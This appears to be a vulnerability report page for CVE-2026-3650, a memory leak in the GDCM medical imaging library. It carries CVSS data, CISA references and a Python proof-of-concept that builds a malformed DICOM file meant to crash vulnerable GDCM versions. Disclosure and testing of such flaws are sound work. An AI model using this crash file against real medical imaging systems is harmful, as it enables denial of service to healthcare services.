Security Vulnerability Report
CVE-2026-3650 CVSS 7.5 HIGH

Published: 2026-03-26 22:16:31
Last Modified: 2026-03-30 13:26:30

Description

A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without properly releasing it.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Grassroots DICOM (GDCM) (for the specific affected versions, see ICSMA-26-083-01)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# PoC script to generate a malformed DICOM file targeting CVE-2026-3650
# This script creates a DICOM file with a non-standard VR in the meta information
# to trigger the memory leak in GDCM.


def generate_malformed_dicom(filename):
    with open(filename, 'wb') as f:
        # 1. Write Preamble (128 bytes of zeros)
        f.write(b'\x00' * 128)
        # 2. Write DICM Prefix
        f.write(b'DICM')
        # 3. Write Meta Element Group Length (Tag 0002,0000)
        # VR is 'UL' (Unsigned Long), Length is 4 bytes
        f.write(b'\x02\x00')          # Group
        f.write(b'\x00\x00')          # Element
        f.write(b'UL')                # VR
        f.write(b'\x00\x00')          # Reserved
        f.write(b'\x04\x00\x00\x00')  # Length (4)
        # Value: Length of meta info (arbitrary for PoC)
        f.write(struct.pack('<I', 100))
        # 4. Write a Malformed Element (e.g., Transfer Syntax UID 0002,0010)
        # Standard VR is 'UI' (2 bytes).
        # We will use a non-standard VR 'XX' to trigger the parsing bug.
        f.write(b'\x02\x00')  # Group
        f.write(b'\x10\x00')  # Element
        # Malformed VR: 'XX' instead of 'UI'
        f.write(b'XX')
        f.write(b'\x00\x00')  # Reserved
        # Length: Set a large length to force allocation
        f.write(b'\xFF\xFF\xFF\xFF')


if __name__ == "__main__":
    print("Generating malformed DICOM file: gdcm_crash.dcm")
    generate_malformed_dicom('gdcm_crash.dcm')
    print("Done. Use this file to crash the vulnerable GDCM version.")
```

References

https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-083-01.json
https://sourceforge.net/projects/gdcm/
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-083-01

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3650", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:31.370", "lastModified": "2026-03-30T13:26:29.793", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory leak exists in the Grassroots DICOM library (GDCM). The bug occurs when parsing malformed DICOM files with non-standard VR types in file meta information. The vulnerability leads to vast memory allocations and resource depletion, triggering a denial-of-service condition. A maliciously crafted file can fill the heap in a single read operation without properly releasing it."}, {"lang": "es", "value": "Existe una fuga de memoria en la biblioteca Grassroots DICOM (GDCM). El error ocurre al analizar archivos DICOM malformados con tipos VR no estándar en la metainformación del archivo. La vulnerabilidad conduce a grandes asignaciones de memoria y agotamiento de recursos, desencadenando una condición de denegación de servicio. Un archivo creado maliciosamente puede llenar el heap en una única operación de lectura sin liberarlo correctamente."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", 
"modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-083-01.json", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/gdcm/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-083-01", "source": "[email protected]"}]}}